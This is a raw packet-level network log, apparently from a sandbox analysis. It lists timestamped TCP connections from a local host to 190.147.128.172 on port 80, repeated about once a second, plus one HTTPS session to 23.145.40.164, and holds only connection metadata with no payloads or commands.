Oct 12, 2024 22:28:55.387770891 CEST	80	49756	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:55.393183947 CEST	80	49756	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:55.393275023 CEST	49756	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:55.393313885 CEST	49756	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:55.395605087 CEST	49757	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:55.398699045 CEST	80	49756	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:55.401074886 CEST	80	49757	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:55.401216984 CEST	49757	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:55.401335001 CEST	49757	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:55.401361942 CEST	49757	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:55.406569958 CEST	80	49757	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:55.406610012 CEST	80	49757	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:56.467653990 CEST	80	49757	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:56.468162060 CEST	80	49757	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:56.468349934 CEST	49757	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:56.468349934 CEST	49757	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:56.473654032 CEST	80	49757	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:56.494889021 CEST	49758	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:56.500446081 CEST	80	49758	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:56.500699043 CEST	49758	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:56.500699043 CEST	49758	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:56.500699997 CEST	49758	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:56.506357908 CEST	80	49758	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:56.506402016 CEST	80	49758	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:57.586148977 CEST	80	49758	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:57.586626053 CEST	80	49758	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:57.586832047 CEST	49758	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:57.586832047 CEST	49758	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:57.588846922 CEST	49760	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:57.592365980 CEST	80	49758	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:57.594033003 CEST	80	49760	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:57.594113111 CEST	49760	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:57.594208956 CEST	49760	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:57.594225883 CEST	49760	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:57.599651098 CEST	80	49760	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:57.599693060 CEST	80	49760	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:58.647370100 CEST	80	49760	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:58.647612095 CEST	80	49760	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:58.647676945 CEST	49760	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:58.647727013 CEST	49760	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:58.649568081 CEST	49767	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:58.653172970 CEST	80	49760	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:58.654737949 CEST	80	49767	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:58.654814005 CEST	49767	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:58.654917002 CEST	49767	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:58.654952049 CEST	49767	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:58.660334110 CEST	80	49767	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:58.660366058 CEST	80	49767	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:59.809421062 CEST	80	49767	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:59.810144901 CEST	80	49767	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:59.810216904 CEST	49767	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:59.810305119 CEST	49767	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:59.815531015 CEST	80	49767	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:59.815695047 CEST	49773	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:59.821042061 CEST	80	49773	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:59.821125031 CEST	49773	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:59.821225882 CEST	49773	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:59.821257114 CEST	49773	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:59.826600075 CEST	80	49773	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:59.826642036 CEST	80	49773	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:00.882107973 CEST	80	49773	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:00.889564037 CEST	80	49773	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:00.890698910 CEST	49773	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:00.890754938 CEST	49773	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:00.892493963 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:00.892544985 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:00.892626047 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:00.892898083 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:00.892925024 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:00.896018982 CEST	80	49773	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:01.505800962 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:01.505886078 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:01.507594109 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:01.507621050 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:01.507911921 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:01.517083883 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:01.559418917 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:01.731127024 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:01.731144905 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:01.731266022 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:01.731298923 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:01.778923988 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:01.819884062 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:01.819891930 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:01.820008993 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:01.820020914 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:01.820029974 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:01.820090055 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:01.820961952 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:01.820967913 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:01.821017981 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:01.822050095 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:01.822118044 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:01.908531904 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:01.908631086 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:01.908756018 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:01.908828020 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:01.909353018 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:01.909405947 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:01.910263062 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:01.910317898 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:01.910970926 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:01.911025047 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:01.911758900 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:01.911820889 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:01.911979914 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:01.912036896 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:01.979561090 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:01.979651928 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:01.997404099 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:01.997493029 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:01.997551918 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:01.997618914 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:01.997862101 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:01.997931957 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:01.998405933 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:01.998470068 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:01.998559952 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:01.998619080 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:01.999363899 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:01.999428988 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:01.999603033 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:01.999656916 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:02.000592947 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:02.000658035 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:02.000755072 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:02.000818014 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:02.002063990 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:02.002176046 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:02.002223015 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:02.002295971 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:02.026463032 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:02.026562929 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:02.068217039 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:02.068320036 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:02.086375952 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:02.086462021 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:02.086590052 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:02.086649895 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:02.086826086 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:02.086885929 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:02.087016106 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:02.087079048 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:02.087102890 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:02.087148905 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:02.087167978 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:02.087189913 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:02.087213039 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:02.087260008 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:02.087289095 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:02.087289095 CEST	49779	443	192.168.2.4	23.145.40.164
Oct 12, 2024 22:29:02.087311029 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:02.087328911 CEST	443	49779	23.145.40.164	192.168.2.4
Oct 12, 2024 22:29:02.370021105 CEST	49790	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:02.376630068 CEST	80	49790	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:02.376837969 CEST	49790	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:02.376838923 CEST	49790	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:02.376929045 CEST	49790	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:02.382256985 CEST	80	49790	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:02.382299900 CEST	80	49790	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:03.439204931 CEST	80	49790	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:03.439730883 CEST	80	49790	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:03.439980030 CEST	49790	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:03.439980030 CEST	49790	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:03.445301056 CEST	80	49790	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:03.468022108 CEST	49796	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:03.472986937 CEST	80	49796	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:03.473063946 CEST	49796	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:03.473176003 CEST	49796	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:03.473217010 CEST	49796	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:03.478657007 CEST	80	49796	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:03.478703976 CEST	80	49796	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:04.555243969 CEST	80	49796	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:04.556098938 CEST	80	49796	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:04.556178093 CEST	49796	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:04.558222055 CEST	49796	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:04.563371897 CEST	80	49796	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:05.041482925 CEST	49802	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:05.047158003 CEST	80	49802	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:05.047312021 CEST	49802	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:05.088399887 CEST	49802	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:05.088399887 CEST	49802	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:05.095603943 CEST	80	49802	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:05.095640898 CEST	80	49802	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:06.138050079 CEST	80	49802	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:06.138746023 CEST	80	49802	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:06.138823032 CEST	49802	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:06.139019966 CEST	49802	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:06.142816067 CEST	49808	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:06.144479036 CEST	80	49802	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:06.148385048 CEST	80	49808	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:06.148590088 CEST	49808	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:06.148591042 CEST	49808	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:06.148591042 CEST	49808	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:06.153795004 CEST	80	49808	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:06.153947115 CEST	80	49808	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:07.234761000 CEST	80	49808	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:07.241862059 CEST	80	49808	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:07.242034912 CEST	49808	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:07.242034912 CEST	49808	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:07.245758057 CEST	49819	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:07.247637033 CEST	80	49808	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:07.251243114 CEST	80	49819	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:07.251317024 CEST	49819	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:07.251553059 CEST	49819	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:07.251590967 CEST	49819	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:07.256794930 CEST	80	49819	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:07.256833076 CEST	80	49819	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:08.323353052 CEST	80	49819	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:08.323421001 CEST	80	49819	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:08.323622942 CEST	49819	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:08.324081898 CEST	49819	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:08.329366922 CEST	80	49819	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:08.331887007 CEST	49825	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:08.337357998 CEST	80	49825	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:08.337567091 CEST	49825	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:08.337567091 CEST	49825	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:08.337567091 CEST	49825	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:08.342834949 CEST	80	49825	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:08.343105078 CEST	80	49825	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:09.404885054 CEST	80	49825	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:09.405164003 CEST	80	49825	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:09.405245066 CEST	49825	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:09.405328989 CEST	49825	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:09.410476923 CEST	80	49825	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:09.413985968 CEST	49832	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:09.419420004 CEST	80	49832	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:09.419581890 CEST	49832	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:09.419826984 CEST	49832	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:09.419826984 CEST	49832	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:09.424931049 CEST	80	49832	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:09.424968004 CEST	80	49832	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:10.496790886 CEST	80	49832	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:10.496826887 CEST	80	49832	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:10.496934891 CEST	49832	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:10.498910904 CEST	49832	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:10.503926992 CEST	80	49832	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:10.505112886 CEST	49841	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:10.510168076 CEST	80	49841	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:10.510255098 CEST	49841	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:10.510524988 CEST	49841	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:10.510557890 CEST	49841	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:10.515578985 CEST	80	49841	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:10.515610933 CEST	80	49841	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:11.566257000 CEST	80	49841	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:11.577018976 CEST	80	49841	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:11.577112913 CEST	49841	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:11.577178955 CEST	49841	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:11.582381010 CEST	80	49841	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:11.587343931 CEST	49847	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:11.593336105 CEST	80	49847	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:11.593549013 CEST	49847	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:11.593549013 CEST	49847	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:11.593636990 CEST	49847	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:11.599046946 CEST	80	49847	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:11.599451065 CEST	80	49847	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:12.657061100 CEST	80	49847	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:12.665472031 CEST	80	49847	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:12.665671110 CEST	49847	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:12.665671110 CEST	49847	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:12.668271065 CEST	49853	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:12.671094894 CEST	80	49847	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:12.673388958 CEST	80	49853	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:12.673463106 CEST	49853	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:12.673738956 CEST	49853	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:12.673738956 CEST	49853	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:12.680645943 CEST	80	49853	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:12.680685997 CEST	80	49853	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:13.772727013 CEST	80	49853	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:13.772773027 CEST	80	49853	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:13.773014069 CEST	49853	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:13.779894114 CEST	49853	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:13.785394907 CEST	80	49853	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:13.982450962 CEST	49859	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:13.987763882 CEST	80	49859	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:13.987854004 CEST	49859	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:13.987952948 CEST	49859	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:13.987977982 CEST	49859	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:13.993138075 CEST	80	49859	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:13.993180037 CEST	80	49859	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:15.061553955 CEST	80	49859	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:15.061604023 CEST	80	49859	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:15.061716080 CEST	49859	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:15.061873913 CEST	49859	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:15.064712048 CEST	49870	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:15.067174911 CEST	80	49859	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:15.070250034 CEST	80	49870	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:15.070327044 CEST	49870	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:15.070422888 CEST	49870	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:15.070442915 CEST	49870	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:15.075679064 CEST	80	49870	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:15.075717926 CEST	80	49870	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:16.143505096 CEST	80	49870	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:16.143526077 CEST	80	49870	190.147.128.172	192.168.2.4
Oct 12, 2024 22:29:16.143580914 CEST	49870	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:16.143764973 CEST	49870	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:29:16.149138927 CEST	80	49870	190.147.128.172	192.168.2.4
Oct 12, 2024 22:30:25.190335989 CEST	50043	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:30:25.196372986 CEST	80	50043	190.147.128.172	192.168.2.4
Oct 12, 2024 22:30:25.196475029 CEST	50043	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:30:25.196594954 CEST	50043	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:30:25.196616888 CEST	50043	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:30:25.201997995 CEST	80	50043	190.147.128.172	192.168.2.4
Oct 12, 2024 22:30:25.202029943 CEST	80	50043	190.147.128.172	192.168.2.4
Oct 12, 2024 22:30:26.260431051 CEST	80	50043	190.147.128.172	192.168.2.4
Oct 12, 2024 22:30:26.260479927 CEST	80	50043	190.147.128.172	192.168.2.4
Oct 12, 2024 22:30:26.260552883 CEST	50043	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:30:26.260684013 CEST	50043	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:30:26.265918016 CEST	80	50043	190.147.128.172	192.168.2.4
Oct 12, 2024 22:30:31.919907093 CEST	50044	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:30:31.925132990 CEST	80	50044	190.147.128.172	192.168.2.4
Oct 12, 2024 22:30:31.925231934 CEST	50044	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:30:31.925354004 CEST	50044	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:30:31.925384998 CEST	50044	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:30:31.930289984 CEST	80	50044	190.147.128.172	192.168.2.4
Oct 12, 2024 22:30:31.930435896 CEST	80	50044	190.147.128.172	192.168.2.4
Oct 12, 2024 22:30:33.004900932 CEST	80	50044	190.147.128.172	192.168.2.4
Oct 12, 2024 22:30:33.005628109 CEST	80	50044	190.147.128.172	192.168.2.4
Oct 12, 2024 22:30:33.005729914 CEST	50044	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:30:33.005783081 CEST	50044	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:30:33.011173964 CEST	80	50044	190.147.128.172	192.168.2.4
Oct 12, 2024 22:30:40.932591915 CEST	50045	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:30:40.937622070 CEST	80	50045	190.147.128.172	192.168.2.4
Oct 12, 2024 22:30:40.937760115 CEST	50045	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:30:40.937889099 CEST	50045	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:30:40.937935114 CEST	50045	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:30:40.942701101 CEST	80	50045	190.147.128.172	192.168.2.4
Oct 12, 2024 22:30:40.942784071 CEST	80	50045	190.147.128.172	192.168.2.4
Oct 12, 2024 22:30:42.007350922 CEST	80	50045	190.147.128.172	192.168.2.4
Oct 12, 2024 22:30:42.007540941 CEST	80	50045	190.147.128.172	192.168.2.4
Oct 12, 2024 22:30:42.007630110 CEST	50045	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:30:42.007716894 CEST	50045	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:30:42.012484074 CEST	80	50045	190.147.128.172	192.168.2.4
